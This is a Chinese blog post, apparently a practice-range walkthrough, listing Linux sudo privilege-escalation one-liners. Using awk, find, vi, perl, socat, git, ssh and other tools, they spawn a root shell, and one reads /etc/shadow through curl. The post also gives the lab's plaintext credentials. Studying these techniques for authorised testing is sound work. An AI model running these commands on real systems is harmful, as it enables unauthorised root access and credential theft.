Linux下提权(基于靶场)
环境配置
这里使用靶场linusec
登录账号密码:
账号:bob 密码:secret这里是普通权限用户
这里假定kali拿到了普通用户权限
kali连接ssh靶机
ssh bob@[目标ip]密码
secretash也是一种shell,占用资源很少的,管理员可能开启
sudo ashawk是一个强大的文本分析工具
sudo awk 'BEGIN {system("/bin/sh")}'使用这个命令可以直接提权到root
bash提权
bash
sudo bash
csh同样是一种shell
sudo cshcurl 提权
sudo curl file:///etc/shadow
dash 一些小型设备可能安装
sudo dashed 文本编辑器,一次只能编辑一行
sudo ed!/bin/sh
env查询环境变量,可以查询环境变量的时候执行一下bin/sh文件
sodu env /bin/sh
expect自动化交互套件,执行程序的时候可以交互
sudo expect -c 'spawn /bin/sh;interact'
find 指定查找文件
sudo find . -exec /bin/sh \; -quit
ftp
less /etc/passwd读取文件时执行文件sh
!/bin/sh
sudo man man man命令的详细解释 man命令是Linux下的帮助指令,执行两次出现问题后输入下面的代码读取使用bin/sh
! /bin/sh
socat 也是一个多功能网络工具
sudo socat stdin exec:/bin/sh
ssh命令
sudo ssh -o ProxyCommand=' :sh 0<&2 1>&2' x
vi
sudo vi -c ':!/bin/sh' /dev/null
zsh也属于shell中的一种,有一些Linux中会使用
sudo zsh
pico用来编辑文本文件的
sudo pico
^R^X
reset; sh 1>&0 2>&0rvim 改进版的vi
使用rvim加上python3执行命令
sudo rvim -c ':python3 import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'perl 环境
sudo perl -e 'exec "/bin/sh";'
tclsh 脚本语言
sudo tclsh
exec /bin/sh <@stdin > @stdout 2>@stderrgit 提权 开源封闭的程序管理系统
sudo git -p help config
! /bin/sh
script
sudo script -q /dev/null
taskset 设置线程的命令,可以把命令绑定到特定的cpu运行
sudo taskset 1 /bin/sh -p密码破解
cat /etc/passwdinsecurity 密码P@ssw0rdsu insecurity切换到这个用户权限
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-11-30,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
